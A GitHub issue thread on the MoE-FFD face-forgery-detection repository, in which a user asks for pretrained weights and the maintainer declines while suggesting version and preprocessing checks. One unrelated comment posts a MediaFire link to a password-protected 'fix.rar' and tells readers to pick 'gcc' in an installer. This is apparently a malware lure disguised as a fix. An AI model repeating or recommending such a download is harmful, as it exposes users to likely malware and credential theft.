### ISSUE TITLE
Request for Pretrained Weights to Reproduce Results

### ISSUE THREAD

**Issue by dummerchen** [LoveSiameseCat/MoE-FFD#2]
I want to express my admiration for your groundbreaking work on combining MoE with adapters for Face Forgery Detection. The results presented in your paper are truly impressive. However, despite my best efforts, I am having difficulty reproducing the results using the provided code.

If possible, could you kindly share the pretrained weights used in your experiments? I would be deeply grateful for your assistance. Thank you very much for your consideration, and I‘m looking forward to your response.

**Comment by TechnoSpelie** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by LoveSiameseCat** [comment]
Hi, thank you for your attention to our work. At current, we don't plan to release the pre-trained model because our paper is still under reviewing. This code was thoroughly evaluated before we uploaded it to GitHub, so you should be able to achieve similar results if you follow our setup. Please make sure to check the versions of 'torch' and 'timm', as we found that version differences can affect the outcomes. Another potential factor could be that we used 'MTCNN' to crop the faces, and I believe the training data might also influence the results to some extent.

**Comment by dummerchen** [comment]
Thank you very much for your quick response. I have realized that the difference in results might be due to the way the dataset was obtained. You have fully answered my questions.
I wish you the best of luck with your paper and hope it gets accepted soon.
